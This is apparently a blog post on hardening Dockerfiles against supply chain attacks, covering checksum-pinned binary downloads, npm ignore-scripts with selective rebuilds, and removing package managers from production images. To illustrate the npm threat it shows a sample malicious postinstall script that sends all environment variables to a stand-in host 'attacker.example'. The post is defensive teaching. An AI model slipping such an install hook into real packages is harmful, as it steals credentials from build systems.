Your Dockerfile is downloading attackers' binaries (and how to stop it)
Three concrete steps to protect your Dockerfile from supply chain attacks: SHA256 checksum verification, controlling npm scripts with ignore-scripts, and removing the package manager from the production image.

On March 19, 2026, someone compromised the Trivy releases on GitHub. Versions v0.69.4, v0.69.5, and v0.69.6 were replaced with binaries containing a credential stealer. For four days, any CI/CD pipeline or Docker build that downloaded Trivy from the official releases page ran malicious code with enough permissions to read the entire container filesystem. The incident was tracked as CVE-2026-33634, with a CVSS score of 9.4.
Our Dockerfile was downloading the latest Trivy release. No version pinning, no verification. Every build fetched the newest binary from GitHub Releases and ran it directly. If we'd rebuilt the image during that four-day window, we would've installed the compromised binary without knowing it.
This article explains the three steps we applied in our project to close that vector and others like it in the npm pipeline. They're simple changes you can put in place in minutes, but they make the difference between a vulnerable build and one that can defend itself.
What a supply chain attack means in Docker
When you build a Docker image, you don't write all the code that ends up inside it. You download base images, install third-party binaries, run npm install, which pulls in hundreds of transitive dependencies. Every one of those steps trusts an external source.
A supply chain attack exploits that trust. Instead of attacking your code directly, the attacker compromises something your code consumes: a binary you download, an npm package you install, a tool you leave in the final image. You don't change anything in your repository, but your next build produces an image with malicious code in it.
In the context of Docker and Node.js, there are three main attack surfaces.
Binaries downloaded with curl. If you download an executable from the internet without verifying its integrity, any compromise of the source server (or a man-in-the-middle attack) can hand you a different binary than the one you expected.
npm scripts. Any package can define postinstall or preinstall scripts that run automatically during npm install. If a transitive dependency gets compromised, its script runs with your build's permissions.

Unnecessary tools in production. Leaving npm, yarn, or corepack in the final image adds transitive dependencies you never use, but that still pile up vulnerabilities and expand the attack surface.
Each of these surfaces can be closed off with a specific step. Let's look at the three of them.
Checksum verification with the Trivy case
The real incident
The CVE-2026-33634 issue wasn't a sophisticated attack. Someone got access to a maintainer's credentials and used that access to replace the binaries in three consecutive Trivy releases on GitHub. The payload was a credential stealer that exfiltrated environment variables and configuration files from the container where it ran. On the related topic of protecting those credentials, our post on secret management with Infisical covers the other side of the problem.
The attack was active from March 19 to 23, 2026. Any pipeline that downloaded Trivy during that window, without pinning the version, installed the compromised binary. That includes thousands of CI/CD builds that use Trivy as a vulnerability scanner. Ironically, the security tool became the attack vector. As a complement, our post on building a full security pipeline without an enterprise budget covers the other side of the coin.
What we had before
Our Dockerfile downloaded Trivy using a very common pattern: detect the latest available version and download it directly.
```dockerfile
# ❌ Vulnerable pattern: downloads the latest version without verification
RUN curl -sfL https://raw.githubusercontent.com/aquasecurity/trivy/main/contrib/install.sh | sh -s -- -b /usr/local/bin
```

This pattern has two problems. First, it doesn't pin the version, so each build can get a different binary, which breaks reproducibility. Second, it doesn't verify integrity, so if the downloaded binary has been tampered with, the build accepts it without complaint.
The fix: pinned version + SHA256
The fix has two parts: pin the exact binary version and verify its checksum before using it.
```dockerfile
# --- Trivy downloader (pinned version + checksum verification) ---
# CVE-2026-33634: Trivy supply chain attack compromised v0.69.4-6.
# ALWAYS pin to a known-good version and verify the SHA256 checksum.
# To update: change TRIVY_VERSION and TRIVY_SHA256 below, then rebuild.
FROM base AS trivy-downloader
ARG TRIVY_VERSION=0.69.3
ARG TRIVY_SHA256=1816b632dfe529869c740c0913e36bd1629cb7688bd5634f4a858c1d57c88b75
RUN apt-get update && apt-get install -y --no-install-recommends curl ca-certificates && \
    echo "Downloading Trivy v${TRIVY_VERSION}..." && \
    curl -fL --retry 3 --retry-delay 5 -o /tmp/trivy.tar.gz \
      https://github.com/aquasecurity/trivy/releases/download/v${TRIVY_VERSION}/trivy_${TRIVY_VERSION}_Linux-64bit.tar.gz && \
    echo "${TRIVY_SHA256}  /tmp/trivy.tar.gz" | sha256sum -c - && \
    tar xzf /tmp/trivy.tar.gz -C /usr/local/bin trivy && \
    rm -f /tmp/trivy.tar.gz && \
    rm -rf /var/lib/apt/lists/*
```

Let's go line by line.
ARG TRIVY_VERSION=0.69.3 pins the version to the last known release before the compromise. There's no ambiguity, every build downloads exactly this version.
ARG TRIVY_SHA256=... stores the SHA256 hash of the compressed file for that version. This hash is taken from a verified source before the compromise happened and committed directly into the Dockerfile.
echo "${TRIVY_SHA256}  /tmp/trivy.tar.gz" | sha256sum -c - is the key line. It compares the hash of the downloaded file against the expected hash (note the two spaces between hash and filename, which the GNU coreutils checksum format expects). If they don't match, the command fails with a non-zero exit code and the build stops immediately. There's no way for a tampered binary to get past this check unless someone also changes the hash in the Dockerfile, which requires access to your repository.
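The failure mode is easy to reproduce outside Docker. Here's a minimal sketch of the same gate, using a throwaway file instead of a real release:

```shell
# Demonstrates how `sha256sum -c` gates a pipeline: a mismatched hash exits
# non-zero, which aborts any `set -e` script or Dockerfile RUN step.
set -e
printf 'pretend-binary' > /tmp/artifact
GOOD_SHA=$(sha256sum /tmp/artifact | cut -d' ' -f1)

# Matching hash: prints "/tmp/artifact: OK" and the script continues
echo "${GOOD_SHA}  /tmp/artifact" | sha256sum -c -

# Tampered hash: sha256sum fails, so a bare `set -e` script would stop here
BAD_SHA=0000000000000000000000000000000000000000000000000000000000000000
if ! echo "${BAD_SHA}  /tmp/artifact" | sha256sum -c - >/dev/null 2>&1; then
  echo "checksum mismatch: build stops here"
fi
```

The same two-line pattern (compute, then compare with sha256sum -c) is what the Dockerfile stage runs; everything else around it is just download plumbing.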
We use a multi-stage build with a dedicated stage (trivy-downloader) to download and verify the binary. The final runner only copies the verified executable with COPY --from=trivy-downloader. That keeps the download tools (curl, ca-certificates) out of the production image.
When you need to update Trivy, you only have to change the two ARG values and rebuild. The comment in the Dockerfile itself documents exactly what to do.
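When bumping, the new hash has to come from somewhere you trust. One option is a small helper run on a trusted machine after downloading and inspecting the new release tarball; this sketch is illustrative (the print_pin name and the 0.70.0 version are invented, not from the project):

```shell
# Hypothetical helper: given a release version and its downloaded tarball,
# print the two ARG lines to paste into the Dockerfile.
print_pin() {
  version="$1"
  tarball="$2"
  sha=$(sha256sum "$tarball" | cut -d' ' -f1)
  printf 'ARG TRIVY_VERSION=%s\nARG TRIVY_SHA256=%s\n' "$version" "$sha"
}

# Demo with a stand-in file; in real use you'd download the release tarball
# from GitHub first and vet it before trusting the hash.
printf 'stand-in release contents' > /tmp/trivy_0.70.0.tar.gz
print_pin 0.70.0 /tmp/trivy_0.70.0.tar.gz
```

Committing the printed lines alongside the version bump keeps the pin and its hash in the same review diff, so a reviewer can check both at once.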
npm and install scripts, code you didn't ask to run
What postinstall and preinstall are
npm lets any package define scripts that run automatically during installation. The most common are preinstall (before install) and postinstall (after install). One legitimate use case is compiling native modules. better-sqlite3, for example, needs to run node-gyp to compile its C++ bindings during installation.
But this same mechanism is a known attack vector. If an attacker compromises an npm package, or one of its transitive dependencies, and adds a malicious postinstall, that script runs automatically on every npm install. You don't need to import the package in your code, and you don't need to call any function. As long as it's in your package-lock.json, its script runs with your build's permissions.
This isn't theoretical. Incidents like event-stream (2018), ua-parser-js (2021), and coa (2021) used exactly this mechanism to distribute malware through the npm registry.
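To make it concrete, here's a sketch of what a compromised manifest can look like. The package name and exfiltration endpoint are invented for illustration, but the shape matches the incidents above:

```json
{
  "name": "some-transitive-dep",
  "version": "1.2.3",
  "scripts": {
    "postinstall": "node -e \"require('https').request({host:'attacker.example',path:'/collect',method:'POST'}).end(JSON.stringify(process.env))\""
  }
}
```

Nothing in your own code ever references this package; the script fires simply because npm install resolves it from the lockfile.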
ignore-scripts + selective rebuild
The fix is to disable all install scripts by default and explicitly enable only the ones you need.
First, we create a .npmrc at the project root.
```
ignore-scripts=true
```

This disables all preinstall, postinstall, and prepare scripts for all dependencies, both locally and in CI. No package can run arbitrary code during installation.
In the Dockerfile, the dependency installation looks like this.
```dockerfile
FROM base AS deps
WORKDIR /app
COPY package.json package-lock.json ./
RUN --mount=type=cache,target=/root/.npm npm ci --ignore-scripts && \
    npm rebuild better-sqlite3
```

npm ci --ignore-scripts installs all dependencies cleanly but doesn't run any scripts. The dependencies get copied into node_modules, but native modules are left uncompiled.
npm rebuild better-sqlite3 explicitly compiles only the native module we know needs it. This is the key step. Instead of letting hundreds of packages run arbitrary scripts, we rebuild only what we've audited and know is legitimate.
The principle is simple: deny by default, allow only what you've verified.
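To decide what belongs on the allow list, you can scan node_modules for packages that declare install-time scripts. A sketch, using a throwaway fixture directory in place of a real node_modules:

```shell
# List packages whose package.json declares preinstall/postinstall scripts,
# i.e. the candidates for an explicit `npm rebuild` allow list.
mkdir -p demo_modules/plain-dep demo_modules/native-dep
printf '{ "name": "plain-dep", "version": "1.0.0" }\n' \
  > demo_modules/plain-dep/package.json
printf '{ "name": "native-dep", "scripts": { "postinstall": "node-gyp rebuild" } }\n' \
  > demo_modules/native-dep/package.json

# Only native-dep shows up, so only native-dep needs a selective rebuild
grep -l '"preinstall"\|"postinstall"' demo_modules/*/package.json
```

Pointing the same grep at a real node_modules usually turns up a handful of native modules out of hundreds of packages, which is exactly why deny-by-default is cheap.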
The local development flow
With ignore-scripts=true in .npmrc, local npm install doesn't run scripts either. That means better-sqlite3 doesn't compile automatically, and the app won't start until you compile it manually.
To keep the development flow simple, we added a postsetup script in package.json.
```json
{
  "scripts": {
    "postsetup": "npm rebuild better-sqlite3 drizzle-kit"
  }
}
```

After cloning the project and running npm install, you just need to run npm run postsetup to compile the native modules. It's an explicit, deliberate step, not something that happens silently.
Removing the package manager from the production image
Why npm in production is a risk
A production image runs your app. It doesn't install packages, it doesn't run npm install, and it doesn't need a dependency manager. Still, the Node.js base image includes npm, yarn, and corepack by default, and with them come dozens of transitive dependencies.
Those dependencies have vulnerabilities of their own. If npm includes a vulnerable version of cross-spawn, glob, minimatch, or tar, your image inherits those vulnerabilities even if you never use them. Security scanners detect them and generate alerts that get mixed in with real vulnerabilities in your application, creating noise that makes it harder to prioritize what matters. From the security angle, our post on Hadolint and Dockle for static Dockerfile analysis digs deeper into this part.
How we remove it
In the runner stage of the Dockerfile, after copying the built application, we remove npm, yarn, and corepack.
```dockerfile
# Strip npm, yarn, corepack from runner — not needed, and their transitive
# deps (cross-spawn, glob, minimatch, tar) carry HIGH CVEs
RUN rm -rf /usr/local/lib/node_modules/npm \
    /usr/local/lib/node_modules/corepack \
    /opt/yarn* \
    /usr/local/bin/npm /usr/local/bin/npx \
    /usr/local/bin/corepack \
    /usr/local/bin/yarn /usr/local/bin/yarnpkg
```

This step goes at the end, after all npm ci and npm run build commands have finished in earlier stages of the multi-stage build. The runner stage only needs node to run server.js.
The result is a cleaner image, with fewer vulnerabilities reported by the scanner and without tools an attacker could use if they got access to the container.
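A cheap way to keep this guarantee from regressing is a build-time assertion. This is a sketch you could append to the runner stage after the rm -rf step (the stage layout is assumed, not taken verbatim from our Dockerfile):

```dockerfile
# Fail the build if any package manager survived the strip step
RUN ! command -v npm && ! command -v yarn && ! command -v corepack && \
    echo "runner stage verified: no package manager present"
```

If a later base-image bump reintroduces one of these binaries, the build breaks immediately instead of the scanner noticing it weeks later.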
The three layers as defense in depth
These three steps aren't alternatives to each other. They're complementary layers that protect different moments in the container lifecycle.
Checksum verification protects what you download. It guarantees that the binary you get from the internet is exactly the one you expect, with no modifications.
ignore-scripts protects what runs during installation. It stops unaudited code from running as part of the build.
Removing the package manager protects what remains in production. It reduces the attack surface of the final image and removes dependencies nobody uses.
Each layer stands on its own. If an attacker manages to bypass checksum verification, because they compromised the source before you pinned the hash, the scripts are still disabled. If a compromised package gets through without needing scripts, the package manager won't be available in production to download extra payloads.
This is defense in depth. One step isn't enough, because each one has its own blind spots. Putting all three together means a successful attack has to compromise multiple links at the same time.
What we learned
Never download a binary without verifying its checksum. It doesn't matter if it comes from GitHub, the project's official website, or a mirror. If you don't verify integrity, you're blindly trusting that nobody has tampered with the source. A sha256sum -c takes milliseconds and stops the build if something doesn't add up.
If a package needs postinstall, rebuild only that package. Most dependencies don't need to run scripts during installation. Disable scripts by default with ignore-scripts=true and explicitly compile only what you've audited.
Your production image doesn't need npm. If your CMD is node server.js, remove npm, yarn, and corepack from the runner. They're development tools, not production tools.
Vulnerability scanners are more useful when they don't have noise. Removing dependencies you don't use cuts irrelevant alerts and lets you focus on the real vulnerabilities in your application.
Every security layer you add means the next attack has to compromise one more link. No single step is foolproof. Security is built by stacking layers that complement each other.
Your container's security doesn't depend only on the code you write, but on the code you choose not to run. Verifying what you download, silencing what you haven't audited, and removing what you don't need are three decisions that take minutes and close attack vectors that can cost months of incident response.
Another entry in the Homelab security series. You came from Practical hardening for a Linux VPS and next up is Centralized secrets with Infisical in Dokploy.